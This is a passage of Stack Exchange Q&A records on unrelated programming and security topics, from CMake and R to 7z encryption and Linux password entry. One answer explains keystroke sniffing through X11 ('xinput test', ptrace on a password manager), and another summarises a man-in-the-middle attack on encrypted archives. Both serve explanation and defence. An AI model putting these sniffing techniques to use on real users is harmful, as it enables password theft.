ctest\n<\/code>\n\nOtherwise for older versions you should start the application with an account with admin privileges for the install to work. i.e.:\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake\n<\/code>\nAnswer: As said earlier, launch the GUI in sudo mode. Open a terminal and type:\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake\n<\/code>\nthen in the GUI, go to Tools menu and Install For Command Line Use and press the Install Command Line Links button. The terminal will show:\n<code>ln -s [\/Applications\/CMake.app\/Contents\/bin\/ccmake] [\/usr\/bin\/ccmake]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmake] [\/usr\/bin\/cmake]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmake-gui] [\/usr\/bin\/cmake-gui]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmakexbuild] [\/usr\/bin\/cmakexbuild]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cpack] [\/usr\/bin\/cpack]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/ctest] [\/usr\/bin\/ctest]\n<\/code>\nand here you are. Tested with cmake-3.1.0-rc2.\nComment: At least as of 3.3.0-rc3 the \"Install For Command Line Use\" menu no longer exists.\nAnswer: This tends to happen to me as well from time to time.\nThe problem is basically that the symlinks from the previous installation are not cleaned up when removing CMake from Applications and now the installer has trouble updating them to the new version.\nThe easiest fix here is to manually remove those links from <code>\/usr\/bin<\/code> and re-run the installer. IIRC it's at least <code>cmake<\/code>, <code>ccmake<\/code>, <code>cmake-gui<\/code>, <code>cpack<\/code> and <code>ctest<\/code> that need removing. Best way is to do a <code>ls -l \/usr\/bin<\/code> from the console and <code>grep<\/code> for all the links pointing to the old CMake installation directory.\nComment: Sorry, ComicSansMS. For some reason it still doesn't work. But thank you so much for suggestion!\nComment: Thanks; without commas, plus cmakexbuild: cd \/usr\/bin ; sudo rm cmake ccmake cmake-gui cpack ctest cmakexbuild\nAnswer: There is a option in \n<code>Cmake GUI->Tools->How to install for command line use\n<\/code>\nwhich shows options\n<code>One may add CMake to the PATH:\n\n PATH=\"\/Applications\/CMake.app\/Contents\/bin\":\"$PATH\"\n\nOr, to install symlinks to '\/usr\/local\/bin', run:\n\n sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n\nOr, to install symlinks to another directory, run:\n\n sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/path\/to\/bin\n<\/code>\nIn which first option worked for me.\nComment: Looks it's the one for ver 3.6.2\nAnswer: In the CMake 3.3.0 there is no longer the option Install For Command Line. Below is how I did it.\nI've downloaded the dmg file and copied to Applications folder. But I had to add the path to the binary to the PATH environment variable. This is the complete step-by-step.\n\nDownload CMake dmg from official website (http:\/\/www.cmake.org);\nOpen the dmg file. Copy the CMake executable to the Applications folder;\nOpen a terminal and type \"cd ~\" (to go to your home folder);\nOpen the file .bash_profile (if it does not exist, create it with \"touch .bash_profile\");\nInside .bash_profile file, insert the following line: \n\nexport PATH=\"\/Applications\/CMake.app\/Contents\/bin\/:$PATH\"\n(This will add the binary of CMake to yout PATH variable)\n\nSave the .bash_profile file and exit;\nBack to the terminal, type \"source .bash_profile\", to update the PATH variable.;\nReady to go! Try to compile again :)\n\nThe good part of adding it to PATH is that it will work every time you restart your computer.\nComment: You can use \"cd\" alone if you want to go your home folder.\nAnswer: very simple,\ninstall the .dmg file then open,\ntools->How to install for Command line use\nyou can find:\nOne may add CMake to the PATH:\nPATH=\"\/Applications\/CMake.app\/Contents\/bin\":\"$PATH\"\nOr, to install symlinks to '\/usr\/local\/bin', run:\nsudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\nOr, to install symlinks to another directory, run:\nsudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/path\/to\/bin\nAnswer: Opening the Applications folder in a terminal \n<code>cd \/\ncd Applications\/\n<\/code>\nthen doing:\n<code>sudo bash\nCMake.app\/Contents\/bin\/cmake-gui\n<\/code>\nThen run from the CMake GUI:\n \"Tools->Install For Command Line Use\"\nworks OK for me.\nAnswer: If you want to install on OSX 10.11 it needs to be installed to \/usr\/local\/bin ( just \/usr\/bin will not work! ). I couldn't get that to work with the cmake I had installed (3.2.1). After downloading the latest version (3.6.1) and using this commandline it worked. No need to go to the gui and click on 'install commandline tools', it just does it instantly.\nnote: it might also work without specifying \/usr\/local\/bin on cmake-3.6.1 - haven't tested that.\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/usr\/local\/bin\n<\/code>\nAnswer: Try use sudo start cmake-gui, and choose folder to \/usr\/local\/bin instead the default \/usr\/bin when install command line\nI was success\n","meta":{"source":"stackoverflow","title":"cmake installer for Mac fails to create \/usr\/bin symlinks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Special equivalent key in symmetric encryption\n\nQuestion: Let $k$ and $k'$ be two keys of symmetric encryption such that for some $m$ we have $\\operatorname{Enc}_k(m)=\\operatorname{Enc}_{k'}(m)$. Is it possible to exist a plain text $m'$ such that $\\operatorname{Enc}_k(m') \\neq \\operatorname{Enc}_{k'}(m')$.\nIn fact, is there exist a key which be equivalent only for special plain text?\nAnswer: Yes. Actually it is quite likely that there are quite a few such keys for block ciphers. That said, finding one takes a collision search which may take a lot of time, especially for ciphers with a large block size.\nProving that there are no other messages that permute to the same ciphertext may even be computationally infeasible.\nIt would not be a good property for a block cipher to have keys that are fully equivalent. It may not directly destroy all trust in the cipher but it would certainly raise a few eyebrows.\n","meta":{"source":"crypto.stackexchange","title":"Special equivalent key in symmetric encryption","dup_signals":{}},"subset":"stackexchange"} +{"text":"Someone is trying to hack my PHP server\n\nQuestion: Today, early in the morning. My dedicated server was slowing because there was numerous requests coming.\nOne error I remember is some message from MYSQL, it said something similar to, max_number_of_connections exceeded. \nIt felt weird because the site I'm working on isn't launched yet, this huge traffic was just unreasonable.\nWhen I went to see the numbers of users online, it was also huge. A same IP address was attempting to go to my links (like 1000 links \/ second). Most of them returned 404. I didn't save them nor I did remember the weird links were shown. \nI went to cPanel my PHP server, to see that the error_log is huge (Last day it was 4.0 KB):\n\nIt keeps on getting bigger, I was able to extract this, it seems like it's the repeated pattern.\n<code>[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n<\/code>\nIt seems like error has been printed millions of time, it made the error_log 1.7 GB so far.\nWhat can I do? Is there a an easy way I could block an IP address using some software to disrupt my server?\nComment: Can you post some examples from the error log of the kinds of requests you're getting? Also this could indicate an issue with your application, if users can easily exhaust some particular resource from a relatively small number of requests then your application is vulnerable to a DoS attack. You might need to look for bottlenecks in your application, use resources more efficiently or restrict who can access certain functionality (eg. via a CAPTCHA).\nComment: Crashing or slowing? What do you mean 'users available'? \"Inserting links\" into your server? What does that mean? You can block a single IP address using your server's firewall, assuming your hosting provider allows you access to that functionality (you'd have to ask them, that'd be their policy, not a tech issue).\nComment: Log rotation is your good friend.\nComment: @georgechalhoub Regarding auto-banning IP addresses or ranges which are the source of an unreasonable amount of requests, check [fail2ban](http:\/\/www.fail2ban.org\/wiki\/index.php\/Main_Page).\nComment: I'm assuming your server is hosted with an ISP. Check with the ISP regarding how to block IPs.\nComment: @Kitsune I edited my answer. I know how to block IP address, this is not my issue. They can mask the IP and still attempt to hack. I want to know what is vulnerable in my site and fix it. I also want to know if I can automatically block an IP trying to go to an unreasonable amount of links in my server.\nComment: @thexacre The file is huge. cPanel is crashing when trying to view it. I may be able to download but it will take ages to finish.\nComment: @georgechalhoub use FTP then use tail or similar on it.\nComment: @thexacre, I was able to get some code from the error_log.\nAnswer: I think there are bigger issues at play, for one your logs seems to suggest there is an issue with your application caused by a file which can't be opened. The fact that there were dozens of logs all within the same second implies that this error is also occurring multiple times in the same request. This may or may not be contributing to your site being slow, sorting these out is probably a question for a different SE site.\nAs I mentioned in my comment above, the issue might also be more to do with your application than (probably) bots making requests to your site. If a certain resource can be exhausted by a relatively small volume of requests then your application is vulnerable to a DOS attack. You might need to look for bottlenecks in your application, use resources more efficiently or restrict who can access certain functionality (eg. via a CAPTCHA).\nIn terms of mitigation, here are some options:\n\nBlock the IP, preferably via an external firewall but failing that then you should be able to use a .htaccess rule. If this is a targeted attack and not an isolated bot malfunctioning then this will probably be a waste of time because the attacker will just change their IP.\nAdd a web application firewall (WAF). CloudFlare is a relatively popular product which includes a WAF and can be used for free.\nContact your web host. Seeing as you're running cPanel I'm assuming you're just a customer on shared hosting. Your host should be responsible for ensuring log rotation is working and may also be able to assist in blocking bad traffic.\n","meta":{"source":"security.stackexchange","title":"Someone is trying to hack my PHP server","dup_signals":{}},"subset":"stackexchange"} +{"text":"android: a newby GUI question - how to declare viewGroup, without layout XML file?\n\nQuestion: In the app, I'm struggling with I have a custom view.\nI cannot declare it in layout XML file, because I'm going to use in from the activity that holds my custom view instance and I need to have access to it (cannot override findViewById...).\nThereof I decided to declare all of the GUI elements into the Activity.\nBut I simply cannot make a single step forward, since I even cannot instantiate viewGroup...\nThis is what I'm trying:\n<code>@Override\npublic void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n ViewGroup vg = new ViewGroup(this.getApplicationContext());\n\n setContentView(vg);\n\n}\n<\/code>\nand I get 'Cannot instantiate ViewGroup'...\nCan someone give a straight-forward example, of how to declare a viewGroup, that holds views?\nThe documentation of the class is also not very beginner-friendly... all the examples are focused on describing the layout in a layout XML file...?\nAppreciate your efford, giving an example! \nAnswer: <code>[ViewGroup][1]<\/code> is an abstract class, you cannot instantiate it. It defines a type of classes that will be container to put other views in them. In other words, layouts like <code>LinearLayout<\/code> of <code>RelativeLayout<\/code> are ViewGroup. Thus, you could do something like that : \n<code> @Override\n public void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n LinearLayout vg = new LinearLayout(this);\n\/\/ set the LayoutParams the way you want.\n\/\/ and add textviews, imageviews, ... here for instance.\n setContentView(vg);\n\n }\n<\/code>\nFor the <code>LayoutParams<\/code>, I think you should start with LayoutParams.Fill_parent\nComment: Thank you very much! Sorry for the enormous ignorance that I showed - I didn't notice ViewGroup was and abstract class...\nComment: NO problem. Everyone does mistakes ;)\n","meta":{"source":"stackoverflow","title":"android: a newby GUI question - how to declare viewGroup, without layout XML file?","dup_signals":{}},"subset":"stackexchange"} +{"text":"why can't a structure have more than one property of type \"text\"\n\nQuestion: \n\nThis doesn't seem right. Why can't a structure have more than one property per type?\nAnswer: The IDE error message is valid.\nDue to the design of Bixby platform (modeling and action planing requires unique concept type), a structure can have at most 1 concept of each type. (The concept could be <code>max(Many)<\/code> for an array) \nOne general rule is to name each of your concept and not directly use any core base type. It might seems unnecessary at the beginning, but soon it will start making sense and making things easier for complex capsules. \nTo fix above error, create a Text type BixbyUserId, and replace with: \n<code>property (bixbyuserid) {\n type (BixbyUserId) \n min (Optional) max (One) \n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"why can't a structure have more than one property of type \"text\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"SpagoBI: End user customized front page\n\nQuestion: I have created a new user, with a new role and I want to configure the user front page. \nI added a document that the admin created, but when I login as my new user, I see a blanc page, I can't see the page content :(\nWhat have I missed, is there another privileges that I need to set to my user to be able to see the document created by the admin?\nThanks in advance for your help!\nAnswer: you have to enter as admin and then:\n1. enter the details of the user's role and enable required functionalities (documents browser, my data, my analysis, ...);\n2. enter Menu configuration and define menu items for user's role.\nAs an alternative, you can develop an external web application using REST API.\nBest regards\nDavide\nComment: Remember that the user home page is the first menu item\n","meta":{"source":"stackoverflow","title":"SpagoBI: End user customized front page","dup_signals":{}},"subset":"stackexchange"} +{"text":"Susceptibility of 7z encrypted archive files to man in the middle attacks\n\nQuestion: Given:\n\nA file (assume 1 GB in size) is encrypted along with filenames using 7zip into a 7z archive using AES-256\nThe file is uploaded to a cloud storage service such as those offered by Google, Amazon, or Microsoft\nThe file is downloaded by a peer on a separate network and the peer is offered the password in a secure manner\n\nAcknowledgements:\n\nI realize that if someone got the password then their job would be easy\nI also realize that the security is only as great as the developer who created 7z made it\nI went through as many similar topics as I could find on here and elsewhere about this and while similar questions have been asked, I don't believe the exact concerns here have been addressed so I hope this is not a duplicate.\n\nQuestions:\n\nDoes using a linux based operation to create such files offer more security than doing so with 7zip on Windows?\nHow susceptible would this kind of operation be to an attacker, government agency, etc... seeking to know what the contents of the archive are? Would that middle man need to intercept the entire file in order to potentially gain access to the contents?\nWhat other flaws may have been overlooked in this approach?\nAre there better alternatives that offer comparably equal ease of implementation?\nComment: The MITM attack would have to be done over whatever channel the key is exchanged through. You say it's a \"secure manner\", so whether or not MITM is a risk depends on how secure it exactly is.\nAnswer: Context\nWhat we have here is a symmetric encryption scheme implemented using 7z for encryption. Since I trust that, as you stated, the password is shared in a secure manner, we can consider it a pre-shared secret (at least pre-shared by the time of decryption). This means that the security of the scheme is dependent on the 7zip implementation of AES, etc.\nAlso, due to the nature of symmetric encryption with pre-shared secrets, an active attack (e.g. a man-in-the-middle attack) is no more useful than a passive eavesdropper.\n\nDoes using a linux based operation to create such files offer more security than doing so with 7zip on Windows?\n\nAs long as your system is not compromised, either system would be equally fine. Which one is less likely to be compromised, etc, is a different question\n\nHow susceptible would this kind of operation be to an attacker, government agency, etc... seeking to know what the contents of the archive are? Would that middle man need to intercept the entire file in order to potentially gain access to the contents?\n\nAs mentioned above, \"intercepting\" the file would be no better\/worse than passively observing it, so a gov't agency would be no better off than your cloud provider, etc.\nWhether they could (physically) compromise your devices, install keyloggers, use a $5 wrench to extract the password, etc, is a different question. How worrisome these threats are is up to you.\nCryptography-wise, the security is 100% dependent on the security of the encryption and the password. Since AES is pretty strong, I'd only worry about the password. (edit, thx @SteffenUllrich:) Since the password is being securely communicated, the only thing that you need to worry about is its strength. I recommend using a password manager to store and generate your password for the time between its creation and when it is sent to your friend\/coworker\/etc.\n\nWhat other flaws may have been overlooked in this approach?\n\n(edited in later:) As mentioned in the comments, you might want to look into how 7zip hashes passwords, etc.\n\nAre there better alternatives that offer comparably equal ease of implementation?\n\nOverall, I'd say that your current setup passes with flying colors. It's simple and uses established algorithms (i.e. AES).\nComment: It appears that 7zip [does not use a salt](https:\/\/crypto.stackexchange.com\/q\/30468\/54184), and most likely does not have any form of integrity such as an HMAC. Those are the main flaws in the setup that I can see.\nComment: Actually I'm not sure if that's still true, since https:\/\/github.com\/philsmd\/7z2hashcat mentions a salt. I guess I'll have to check the actual source code.\nComment: *\"I'd only worry about the password, which, as you said, is securely communicated and is therefore not a worry either.\"* - one can also communicate a weak password in a secure way. The security not only depends on the secure sharing of the password but also on the strength of the password itself. AES and KDF will not help much against brute-forcing if a weak password was used.\nComment: @SteffenUllrich oops, nice catch :)\n\nI didn't mean to phrase it that way, but after rereading my answer I now realize that I mistakenly assume that the password he is using is secure. \n\nI'll edit my post with better wording\nComment: Thanks for the input. I should have added the assumption that the password is strong and secure. Thanks for mentioning passive easvesdropping as well. That is really more of a concern than a man in the middle. Ultimately I think this set up is sufficient as well as I am not expecting an attack and am just seeking privacy.\nAnswer: While the answer provided by @user196499 is spot on the one thing i think should be discussed is time.\nSince your cryptographically secure archive has been created and placed online what is the allowable time it may remain secure?\nKey lifetimes should be implemented due to the fact that on a long enough timeline every keys security drops to 0.\nFactorization of a key (brute force), cryptanalysis of the algorithms output, side channel attacks in the cipher mode, iv weakness etc all play a part in the time of which the archive can be considered secure.\nAs mentioned, set a max on the key lifetime and if needed when implementing a new key reevaluate the mode of encryption being used; I.E. CBC, CTR , GCM etc\nComment: While key expiration is great for public keys where you don't want people to send you messages encrypted with a compromised key, etc, it still doesn't solve the problem of stuff already encrypted using the key (i.e. the files encrypted w\/ 7zip)\nComment: NIST SP 800-57 Pt. 1 Rev. 4 recommends a lifetime associated with the key. Asymmetric or symmetric keys are still keys and over time are indeed susceptible to attacks. Rotating a key would require a decryption, re encryption but further protects the resulting cipher text.\nAnswer: The underlying cipher is secure.\nHowever, a specific practical MITM attack on encrypted archives has been proposed: https:\/\/link.springer.com\/article\/10.1007%2Fs10207-006-0086-3\nThe attack consists of intercepting the archive and editing the header to change indicated compression mode, so that the archive decrypts correctly, but decompresses incorrectly. The recipient is then expected to send back the garbled file, which the attacker intercepts again, fixes the header, and gets the data.\nOf course, this isn't an attack on archives so much as it is an attack on unathenticated encryption in general. It also relies on highly reckless user behavior - but, if there are hundreds of recipients, it's conceivable that someone might do that, particularly if the MITM can also forge communications between the parties.\nThis scheme can be improved with encrypt-then-MAC authentication and ensuring the recipients verify the file before opening.\n","meta":{"source":"security.stackexchange","title":"Susceptibility of 7z encrypted archive files to man in the middle attacks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Highlight values in a data frame in R\n\nQuestion: I have a database with rankings from three different methods. Note that some methods have similar values, for example for the first alternative we have two values equal to 1 and another with a value equal to 29. Therefore, I would like to know if there is any way to highlight the repeated values for the same line, who knows how to leave it in red or in another way of highlighting.\nCan you help me with this?\n<code>result<-structure(list(n = c(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, \n 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, \n 28, 29), M1 = c(29L, 1L, 28L, 27L, 25L, 26L, 24L, 20L, 21L, \n 22L, 23L, 15L, 12L, 17L, 18L, 19L, 16L, 13L, 14L, 5L, 6L, 7L, \n 8L, 9L, 10L, 11L, 4L, 2L, 3L), M2 = c(1, 29, 28, 27, 26, 25, \n 24, 23, 22, 21, 20, 15, 12, 19, 18, 17, 16, 14, 13, 11, 10, 9, \n 8, 7, 6, 5, 4, 3, 2), M3 = c(1L, 29L, 28L, 27L, 25L, 26L, 24L, \n 20L, 21L, 22L, 23L, 15L, 12L, 17L, 18L, 19L, 16L, 13L, 14L, 5L, 6L, 7L, 8L, 9L, 10L, 11L, 4L, 2L, 3L)), class = \"data.frame\", row.names = c(NA,-29L))\n\n> result\n n M1 M2 M3\n1 1 29 1 1\n2 2 1 29 29\n3 3 28 28 28\n4 4 27 27 27\n5 5 25 26 25\n6 6 26 25 26\n7 7 24 24 24\n8 8 20 23 20\n9 9 21 22 21\n10 10 22 21 22\n11 11 23 20 23\n12 12 15 15 15\n13 13 12 12 12\n14 14 17 19 17\n15 15 18 18 18\n16 16 19 17 19\n17 17 16 16 16\n18 18 13 14 13\n19 19 14 13 14\n20 20 5 11 5\n21 21 6 10 6\n22 22 7 9 7\n23 23 8 8 8\n24 24 9 7 9\n25 25 10 6 10\n26 26 11 5 11\n27 27 4 4 4\n28 28 2 3 2\n29 29 3 2 3\n<\/code>\nComment: You would have to define a custom `print` method taking advantage of the `crayon` package, which allows you to add color and other formatting to the text R console (only in RStudio). Quite a lot of work. It would be much easier to create a set of flag columns that parallel your data columns. Would that meet your needs?\nComment: Thanks for the answer @jdobres! I think so.\nAnswer: Colors are only available in the RStudio console through the <code>crayon<\/code> package, so you would need to write a whole custom print method, which is a fair bit of work. Instead, you could use the tidyverse packages to create a set of flag columns that make it easier to track the duplications:\n<code>library(tidyverse)\n\noutput <- result %>%\n pivot_longer(M1:M3) %>% \n group_by(n, value) %>% \n mutate(T_F = ifelse(n() > 1, 'T', 'F')) %>% \n pivot_wider(values_from = c(value, T_F), names_glue = '{name}_{.value}')\n\ncolnames(output) <- gsub('_value', '', colnames(output))\n\n n M1 M2 M3 M1_T_F M2_T_F M3_T_F\n <dbl> <dbl> <dbl> <dbl> <chr> <chr> <chr> \n 1 1 29 1 1 F T T \n 2 2 1 29 29 F T T \n 3 3 28 28 28 T T T \n 4 4 27 27 27 T T T \n 5 5 25 26 25 T F T \n 6 6 26 25 26 T F T \n 7 7 24 24 24 T T T \n 8 8 20 23 20 T F T \n 9 9 21 22 21 T F T \n10 10 22 21 22 T F T \n# \u2026 with 19 more rows \n<\/code>\nComment: Thanks for the answer! I think the way you did it, it's much better to check equal values. I just wish it could be adjusted the names, ie, not to be `value_M1`, leaving just `M1`. That goes for others. And in case of `is_dupe_M1`, leave `M1 (T\/F)`\nComment: Column names with spaces, parentheses, and slashes are not recommended, but I've reformatted the result to be closer to what you want. If this works for you, please mark as correct, and optionally, upvote.\n","meta":{"source":"stackoverflow","title":"Highlight values in a data frame in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Linux Security of typing passwords via xdotool vs keyboard driver vs other solutions\n\nQuestion: I am looking for quiet universal solution how to approach software keyboard for typing passwords under Linux.\nSecurity level expectations:\nAchieve not worse (or acceptably slightly worse) security than when passwords are typed to applications on physical USB keyboard.\n(as in worst case it's starting point for many applications does not supporting more advanced means, and also, I can make\/buy hardware password manager acting as usb keyboard as alternative).\nThe scope of my concern here is comparison of attack vector\/risks of solutions based on USB keyboards or keyboard drivers vs just typing them via <code>xdootool type<\/code> ?\n(to unaware readers : copying passwords via clipboard has vector attack that any of your applications can read it)\nPlease note to all readers of question:\nIf your machine is compromised, there are plenty of ways your passwords or keys can be leaked: including stealing them from programs' memory.\nHere I would like to consider what's \"reasonable\" method of transporting passwords (definitely I am looking for something better than via clipboard), while considering tradeoffs in mind (yes, keep hardware keys, etc, whenever you can, however not all systems support those more advanced means of authorisation).\nAnswer: Any application that you've run at least once can, if it wants to, see everything that you type, read all your files, and extract your passwords from your password manager. All it has to do is inject itself somewhere into the system:\n\nTo see everything you type: connect to the X server and ask. (To see how, run <code>xtrace xinput test 42<\/code> where 42 is the device ID of your keyboard.)\nAlternatively, grab the focus without giving any visual cue (and retransmit the input to the application that looks focused, to avoid immediate detection).\nTo read all your files: <code>open<\/code>, <code>read<\/code>.\nTo extract your passwords from your password manager: read the password database file and listen in while you're typing your master password. Alternatively, inject a wrapper around the password manager process and <code>ptrace<\/code> it.\n\nYes, in theory you could notice it. But in practice, you won't.\nPutting password in the clipboard does have weaknesses, but local applications are not the problem. Local applications can get your passwords anyway. The main weaknesses of passwords in the clipboard are:\n\nBrowser bugs that allow web applications (i.e. any open browser tab) to access the clipboard.\nClipboard managers that retain a copy of the password in a place you wouldn't think of.\nAccidental pasting into the wrong field.\n\nThe safest way to manage passwords is to avoid manipulating them. This eliminates the risk of user error. So save your passwords in your web browser and have it use the password automatically.\nFor non-web uses, injecting keyboard input with <code>xdotool<\/code> is as good as it gets. Local applications can get the passwords anyway, so you aren't losing anything.\nComment: It looks like https:\/\/www.qubes-os.org security through isolation is the right way to go. Anyhow, thank you very much for this clarification to all readers. Even it confirms that keyboard is more secure than clipboard, your answer makes it really clear why! (And also creates more respect to browser build-in password manager:) ).\nAnswer: As it seem to me, the primary point to attack are the X11 events, which are rather easy to eavesdrop for any local application e.g. by <code>xinput test <dev><\/code>. Also X11 is the part of (most) standard distributions, and for them all input (including USB keyboards) is channeled through X11.\nThe <code>xdotool<\/code> uses X11 facilities (XTEST) to inject the requested key stroks. So I assume it sends them directly through the X11 event stack as every other input. Since you explicitly specified that your reference is a USB keyboard, I'd say this way you reach your goal of not introducing further flaws.\nNote: there are some applications like <code>gksudo<\/code> which are rather resistant to X11 sniffing, I don't know if that applies also to the <code>xdotool<\/code> input. Otherwise it would be a weakness.\n","meta":{"source":"security.stackexchange","title":"Linux Security of typing passwords via xdotool vs keyboard driver vs other solutions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Amazon S3 + Lambda (Node.JS) clarification on the s3.upload() method\n\nQuestion: I am following this tutorial wherein the programmer used this code:\n<code>await s3\n .upload({ Bucket: bucket, Key: target_filename, Body: file_stream })\n .promise();\n<\/code>\nNow, I understand that the method above would use the initialized variables <code>file_stream<\/code>, <code>bucket<\/code>, and <code>target_filename<\/code> (which he didn't bother typing out in his tutorial).\nBut the tutorial is hard to follow since (for what I know) the <code>Key<\/code> parameter inside the upload is the actual directory of the file to be re-uploaded back to S3.\nThis is confusing because at the <code>file_stream<\/code> variable, another <code>Key<\/code> parameter exists inside the method <code>getObject()<\/code>.\nSo, is the <code>filename<\/code> inside the <code>getObject()<\/code> method should be the same as <code>target_filename<\/code> of the <code>upload()<\/code> method? and can you initialize the variables mentioned just to make it clearer for this question? Thank you.\nAnswer: No, the <code>filename<\/code> inside the <code>getObject()<\/code> method may not be the same as the <code>target_filename<\/code> in <code>upload()<\/code>. Let's look at a concrete example. Suppose you have a <code>photo.zip<\/code> file stored on S3 and its key is <code>a\/b\/photo.zip<\/code>, and you want to unzip it and reupload it to <code>c\/d\/photo.jpg<\/code> assuming that the <code>photo.zip<\/code> only contains one file. Then, the <code>filename<\/code> should be <code>a\/b\/photo.zip<\/code>, and the <code>target_filename<\/code> should be <code>c\/d\/photo.jpg<\/code>. As you can see, they are clearly different.\nComment: @monkeybanana No, you can name it whatever you want. It's just an example.\nComment: Ok, it's possible. You can follow [this example](https:\/\/www.npmjs.com\/package\/unzipper#parse-zip-by-piping-entries-downstream) and get the file names in the zip file.\nComment: in regards to the `target_filename`, it should still indicate a filename and a file extension?\nComment: but how should I unzip or use the `target_filename` if the content of a zip file is multiple files that are not (using the concrete example you use) `photo.jpg`?\nComment: I don't understand your question. What's the usecase?\nComment: The `target_filename` should upload the same filename and file type inside the zip folder it comes from. But the problem with the tutorial is that it does not use a concrete variable example on how to use that. it just says **\"initialize the variables here\"**\nComment: Also, I don't want my newly unzipped files to be renamed into `target_filename`, I just want it to retain the variable name it has, assuming that the zip file contains multiple files inside.\n","meta":{"source":"stackoverflow","title":"Amazon S3 + Lambda (Node.JS) clarification on the s3.upload() 